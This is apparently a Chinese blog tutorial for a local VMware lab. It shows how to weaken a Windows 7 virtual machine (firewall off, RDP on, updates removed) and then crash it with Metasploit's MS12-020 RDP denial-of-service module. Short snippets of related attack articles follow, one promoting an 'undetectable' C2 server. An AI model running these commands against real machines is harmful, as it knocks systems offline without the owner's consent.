kali漏洞攻击win7

最新推荐文章于 2024-08-28 21:39:09 发布
最新推荐文章于 2024-08-28 21:39:09 发布
阅读量196 收藏
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jikm__/article/details/134156114
版权

  #教学仅限于本地的虚拟机攻击
准备系统镜像
kali    win7
    #以VMware Workstation Pro的虚拟机演示

    首先在主页找到编辑--->虚拟网络编辑器-->添加网络-->VMnet4-->lp改为192.168.2.0 -->

    将kali和win7的网络适配器都改为VMnet4

    1. 配置kali环境 (以下代码是直接在root用户下进行)
vim /etc/network/interfaces  (修改网卡配置文件)
 
 
auto  eth0
iface  eth0  inet static
address 192.168.2.2
netmask 255.255.255.0
gateway 192.168.2.254
 
(在原有的最后两行后加上以上5行)
 
 
/etc/init.d/networking restart  (重启网卡配置)
 
 
reboot   (重启kail)
 
#######################################################
 
 ifconfig    (重新进入kail后查看ip)
 
 
 #对照自己的ip 子网掩网 网关进行检查

    2.配置win7环境 
    更改ip地址: 

    右键网络属性-->更改适配器设置-->右键本地网络属性--> Internet 协议版本4

    关闭防火墙:

    控制面板-->系统和安全-->Windows防火墙-->打开或关闭Windows防火墙

    启用远程桌面: 

    右键计算机属性-->远程设置-->远程

     卸载程序:

    控制面板-->卸载程序-->查看已安装的更新-->全部卸载

( 最后重启win7)

    3.准备攻击
    查看两个系统网络是否ping通:

    设置攻击框架并进行攻击:

msfconsole
 
search dos
 
search ms12-020
 
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
 
set rhost 192.168.2.3
 
run
 
 


    (win7重启电脑即可恢复正常)
 

Jikm__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 452
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
【MySQL高级】MySQL的日志
qq_53058639的博客
03-18 950
二进制日志(BINLOG)记录了所有的 DDL(数据定义语言)语句和 DML(数据操纵语言)语句,但是不包括数据查询语句。此日志对于灾难时的数据恢复起着极其重要的作用,MySQL的主从 , 就是通过该binlog实现的。二进制日志,MySQl8.0默认已经开启,低版本的MySQL的需要通过配置文件开启,并配置MySQL日志的格式。Windows系统:my.ini Linux系统:my.cnf。
如何使用kali来入侵(渗透)一台windows
cc123489ll的博客
06-04 367
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali系统远程Windows桌面
weixin_52151447的博客
11-08 822
win10中需要在远程设置中的高级设置中 将“需要计算机使用网络级别身份验证进行连接(建议)”功能关闭。win7中需要在远程设置为“允许运行任意版本远程桌面的计算机连接(不安全)”kali系统使用rdesktop连接Windows桌面时,连接失败,提示。
利用漏洞永恒之蓝ms17-010对win7目标进行渗透
ABABC1234的博客
07-06 1130
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者不要利用技术做违法的事情,不然真的会很刑!!!
kali入侵win7(转载)
m0_56071898的博客
05-04 5724
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
kali 漏洞攻击 win7演示
Suyiixx的博客
09-11 500
kali 利用漏洞攻击 win7系统,直接瘫痪
kali利用ms17-010漏洞实现win7系统入侵
2301_77296801的博客
10-12 1780
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
weixin_47731659的博客
01-19 1873
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
Kali 如何利用CVE-2019-0708漏洞渗透Win7
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
05-03 304
1.攻击者IP:192.168.1.10系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.8系统:Windows 7 6.1.7601 Service Pack 1 Build 7601已开启远程协助RDP服务开启了3389端口。
kali无法和win ping通,kali虚拟机无法和windows主机连接网络
qq_44749903的博客
03-22 1万+
kali无法和win ping通,kali虚拟机无法和windows主机连接网络
使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)...
aoshuguan4553的博客
09-27 1291
1、开启postgresql数据库 2、msfconsole 进入MSF中 3、search 17-010 搜索cve17-010相关的exp auxiliary/scanner/smb/smb_ms17_010 扫描漏洞是否存在 exploit/windows/smb/ms17_010_eternalblue 用来攻击的exp 4、...
kali入侵win7
caijinbo
11-23 5731
title: kali入侵win7 tags: 教程 author: caijinbo date: 2019-11-19 前提说明 1.在同个局域网内 2.准备纯净系统的win7系统电脑一台 3.准备kali系统一台 4.我的操作均是在虚拟机上完成,可能在物理机上效果会有所不同。 步骤 第一步: 扫描局域网内存活的主机: nmap -sP 192.168.1.0/24 (扫描较快) 也可以直接...
kali利用永恒之蓝攻击win7
热门推荐
sievr的博客
02-11 1万+
kali机:192.168.198.134 win7:192.168.198.138 照常来查看一下自己的IP地址 接下来就是配置靶机的环境了 1.网络连接方式选择公用网络 2.关闭公用网络的防火墙(否则ping不通靶机) 现在可以离开win7了 打开我们最可爱的kali,启动我们的msfconsole小可爱 (msfconsole都是爱你的样子哟) 好的我们来搜索一下永恒之蓝在msf中...
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1513
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
服务器远程管理
m0_64827698的博客
08-26 1018
SSH两种级别的安全认证:基于口令(口令在网络上传播,易受中间人攻击),基于密钥(传公钥,公钥是否相同,公钥加密质询,私钥解密)(密钥不在网络上传)2.启用服务services.msc(telnet)/配置远程桌面服务gpedit.msc(rdp)/使⽤SSH,你可以把所有传输的数据进⾏加密,这样“中间 ⼈”这种攻击⽅式就不可能实现了。实验总结:在windows开启telnet服务(2019不支持),RDP服务,SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法,以优化安全性和性能。
如何将十六进制的乱码转换成汉字
最新发布
2401_85258690的博客
08-28 559
可以看出,接收到的报文第一行包含了我们想要的信息,我们需要将。在TCP通信时,抓包得到的请求报文,我们需要对其进行分析,中心思想为:剔除%,用strtol将16进制乱码进行转换。
系统编程 网络 http协议
qq_69971969的博客
08-24 1008
--------------------------------------表示了资源所在的路径。意思:域名解析=>把对应的域名解析为对应的ip。<协议>://<主机>:<端口>/<路径>万维网:http解决万维网之间互联互通。http:应用层协议,底层是tcp协议。http协议------应用层的协议。1.如何在万维网中表示一个资源?http协议加密:tls,ssl。计算机web端网络只能看到文字。<http>只是协议的一种。html 超文本标记语言。http 超文本传输协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值